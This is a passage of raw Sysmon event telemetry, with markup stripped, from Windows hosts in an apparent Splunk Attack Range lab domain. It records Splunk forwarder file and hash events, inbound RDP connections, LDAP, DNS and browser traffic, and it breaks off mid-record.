23542300x80000000000000001049040Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:08.752{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2BB9D4537C24F854A7F161A7E16526A4,SHA256=E91154A20FDF483045DC9C179955067C02E036996B765047A1569B8B9CC40B73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049039Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:08.752{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7C6CDAF219836444A05DD20121B0E225,SHA256=0B117E0321B8B0EA9F9018DC1C5012795F43CB518559EA7E977C23FAA1CB9615,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049038Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:08.715{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D27441CA31745F983C357FEDC4BABE44,SHA256=E4668066A3E9603292D701DC5BBD9C9511027C2B7080F495705C2632C54BA379,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977627Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:08.625{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FF9785848187177B7AE402DABE923E43,SHA256=AD5FEC5CAA2C92D544DCE0ED848EAA809ED5CFDAF334F85F25C305A05A5002B6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977626Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:05.367{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-49418-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000977625Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:04.707{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59313-false10.0.1.12-8000- 23542300x80000000000000001049042Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:09.716{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95F9DF6D72174B125A4198CB0631144B,SHA256=C9230A4479FEFEE62C54982DED573C1043E1E878406C1F3FFDD0DED8A5AB244E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977629Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:06.266{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-41936-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977628Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:09.172{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7FFB4AC44706BA19EA3BA6B0B1EA64B,SHA256=DCF04BFEE1521FEBBC716CD2EF2A55E539D016A506A52AECCB40640CA6992C39,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049041Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:07.141{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-60726-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049044Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:10.735{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=974A617EF7FC593A9875780E9C965169,SHA256=5FBE6D2D1AD6947704E5FF7F494753FCE6460F6EEF671F8B995B531A3E8EDA6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977630Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:10.391{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB6CA99F0215F37537DE023EB543416A,SHA256=14ECA86D12D5D3CDFE5ACB8635A44DCEE7A8F7E83D470C8A41C6AD251039B4E5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049043Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:07.859{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53278-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001049045Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:11.752{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B58F7D4834C196D3F8F4544971D86F6,SHA256=63C17BADA0BF28B85B61F3F6F0B068725857BDA6B7AAADC9237B4ACC639FD064,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977631Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:11.454{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F11C8788AB5DAC1EC5DD209ABF1384B,SHA256=E2E99068C8FA873DC13FF7249F2FC296AE1A4F9631232287DED81FDC4D15259E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049046Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:12.947{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F43DC070014135CD21A1C6A4D037ACAD,SHA256=7E5B40C39A327FF0FD6D8F41A621675F4654FE338853485BD4F5018A33D35596,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977634Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:12.688{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8ED65C8090823CB265DA70121A0E2B4,SHA256=FB0021A89A60ED643AABECD3DE268B4F5479F1088938E933F85E3C14A9EA6677,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977633Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:09.817{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59314-false10.0.1.12-8000- 354300x8000000000000000977632Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:09.240{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-53428-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001049047Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:13.966{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=218FD7050D7AE67B4890E4B4CCE8F54A,SHA256=DAD38237C60B0D673C793E80575A4C92A401E5471611DF24991A63499E5B83D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977636Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:13.704{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AABC42451C5F864CD0BE7AE49239108,SHA256=AA16E01F98F58CD3413686FD610DF8C6CC48D25740558B2D2DE3CA16BCF3BCC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977635Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:13.547{69CF5F33-7F29-614D-1D00-00000000FD01}1960NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977639Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:14.719{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1D5D976E58047F9669485F67986E38D,SHA256=424F8F2FE0F6447CB6B8E244FCDCB1E3D19DB11CAC814C20B144DF8C3592E933,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049048Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:14.997{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33B77E1C7BB7399EA1AC0057D1C46836,SHA256=92286AB61FD6223FCB73901673F4906042A92013E010DD66591D5927C1D15128,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977638Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:14.469{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=234EF1755B01BD901E71C7CCC3DFCF11,SHA256=1192698C1F14AB64AC77F08E3369BF6551AF779BAE5281C8F8C6C0C8668C27BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977637Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:14.469{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=86106F199DCA6DA6275EF7A86DD809F6,SHA256=9C4D70CDA1347565BC8597906C94C9755F59C78FFD20704D97963B31F97C4EA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977641Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:15.969{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F71F46F0FA84FD980210847E3B53A376,SHA256=DE62060AABED9A03EEB9B59AC39181A204B47041DC0256C01430F6831C430385,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977640Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:12.192{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59315-false10.0.1.12-8089- 354300x80000000000000001049049Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:13.758{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53279-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001049052Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:16.964{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=89E2FEE10AF30409FCB0338C66E20287,SHA256=66C19BC3FA97C77BE34F65928C881EDF86E729E7C75CB66B79119A175A278A6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049051Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:16.964{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2BB9D4537C24F854A7F161A7E16526A4,SHA256=E91154A20FDF483045DC9C179955067C02E036996B765047A1569B8B9CC40B73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049050Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:16.027{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7350F94437F1788803FA091F0772D58,SHA256=93D42BD73AAB529E51A6FF188B4A5464B26EAB2853C7F2568F99179CA9D9F638,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977642Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:16.391{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=234EF1755B01BD901E71C7CCC3DFCF11,SHA256=1192698C1F14AB64AC77F08E3369BF6551AF779BAE5281C8F8C6C0C8668C27BA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049056Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:17.563{5EBD8912-7F30-614D-0D00-00000000FC01}8886076C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2E00-00000000FC01}2456C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049055Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:17.563{5EBD8912-7F30-614D-0D00-00000000FC01}8886076C:\Windows\system32\svchost.exe{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001049054Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:15.327{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-50684-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049053Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:17.044{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35E726DD3D8472C8B0C1D66C699A41BA,SHA256=0CD33E307BB1E81636DAC8C7E25123DD503AA3798B5D06D6F20B054761258FFB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977645Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:14.480{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-24283-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000977644Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:13.670{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-50197-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977643Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:17.032{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9D4221973DBA6621727627FF078B172,SHA256=9A6AFB0C7B4A60FE0FE136CCDA34C475DF92C85AA9A7210C33BACB6B6323B55A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049059Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:16.003{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53280-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001049058Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:16.003{5EBD8912-7F40-614D-2700-00000000FC01}2888C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53280-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 23542300x80000000000000001049057Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:18.048{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6F29BEEF259508227BC7FAD50C2D17C,SHA256=3441DBC0BDB6ED4303FCA7702B412310BE6F5310EA9E88D02C25D1D87D092720,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977646Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:18.047{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=056BFB884669E51F9C283CAFC85397BA,SHA256=DBEEDC748DEC988D7BF8ACB4D09F0893376AEC2588783F9CC4906731B80965C4,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000001049064Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:17.903{5EBD8912-7B3A-6151-3A78-00000000FC01}7120pipeline-incoming-prod-elb-149169523.us-west-2.elb.amazonaws.com035.155.6.125;35.167.102.239;54.187.157.95;44.239.125.99;35.162.134.178;52.24.163.249;52.37.158.247;54.70.80.82;C:\Program Files\Mozilla Firefox\firefox.exe 354300x80000000000000001049063Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:17.594{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local50084- 354300x80000000000000001049062Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:16.796{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-55878-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049061Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:19.110{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=89E2FEE10AF30409FCB0338C66E20287,SHA256=66C19BC3FA97C77BE34F65928C881EDF86E729E7C75CB66B79119A175A278A6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049060Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:19.110{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=308C755A2F9F677543C986D465F4D0F7,SHA256=18BA80179BF31C3FF47FDEDDA1E9DD92914AB2072B67E4994CB7B08C0F9F04B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977649Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:19.625{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=36EE375F4E0FEBB1B1AE236A57835E70,SHA256=CD926AFD88196A1FA37B82A36E7D9FE24D7A91293E66E48C2DB6F978CC551FDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977648Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:19.063{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA34D5B435EC7025F403E7C136ED46DC,SHA256=44FA42C0829695D282A9A5A7D28A4F066AA764AA06572FA47827136E4C64BD4C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977647Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:15.707{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59316-false10.0.1.12-8000- 23542300x8000000000000000977650Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:20.063{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAF42AB6EA5311BF40284DE176359154,SHA256=298B7F28BD4DCA092BD90934A490BDD736452F11748E4124F127F2A92E6DA1C4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049067Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:17.962{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-56638-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001049066Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:17.740{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-429.attackrange.local53281-false54.70.80.82ec2-54-70-80-82.us-west-2.compute.amazonaws.com443https 23542300x80000000000000001049065Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:20.144{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B699741D4A7D4B5DCD9E0655F66098F,SHA256=7CD97B0818B9738A398DBFF349CA05891613666C38FDAD5C98B0F344A64DC4E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977651Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:21.078{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5860FE5FED4978557F9E7F43FCA8F9E,SHA256=271EEDBFE1159C695AF54ADEC08647E9B1C9604D16FE8335B26A4434C0D773F8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049069Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:19.736{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program 